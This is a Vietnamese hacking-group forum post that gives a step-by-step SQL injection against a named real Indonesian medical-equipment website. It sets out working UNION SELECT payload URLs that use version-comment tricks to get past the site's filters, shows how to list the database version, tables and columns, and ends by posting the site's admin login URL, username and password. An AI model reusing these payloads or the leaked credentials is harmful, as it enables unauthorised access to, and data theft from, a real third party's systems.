Hướng dẫn check site chặn ký tự và query

Victim: http://www.alatkesehatan.co.id

Lưu ý: site này bị cắn query "concat" và chặn luôn dấu "( )" nhé.

Ta tìm version:
http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,2,3,4;&nm=doctor_equipment

ra được số "2" thay version vào

http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,@@version,3,4;&nm=doctor_equipment

=>  5.5.34-log

Get Table:

http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,/*!10000table_name,3,4 from /*!10000information_schema*/.tables where table_schema=database() limit 0,1;&nm=doctor_equipment

Ta tăng "Limit" lên dần dần để tìm từ khóa khả nghi
=> Limit 0,1 = tbl_config
Theo thứ tự 1,1 rồi 2,1...

Get Column:

http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,/*!10000column_name,3,4 from /*!10000information_schema*/.columns where table_name=0x74626c5f75736572 limit 0,1;&nm=doctor_equipment

Khai thác y chang như get table nhé. Cứ tăng dần Limit.
----------------------------

Link Admin: http://www.alatkesehatan.co.id/myadmin
User ID: admin
Password: A789000EE==
-------------------------------
Lưu ý đây là site mẫu tôi đã check qua rồi và đã hướng dẫn nhiều rồi nên các bạn chỉ xem đây là một bài học kinh nghiệm

--- Checked By Quý Huỳnh, Admin VN - Hacking Group ---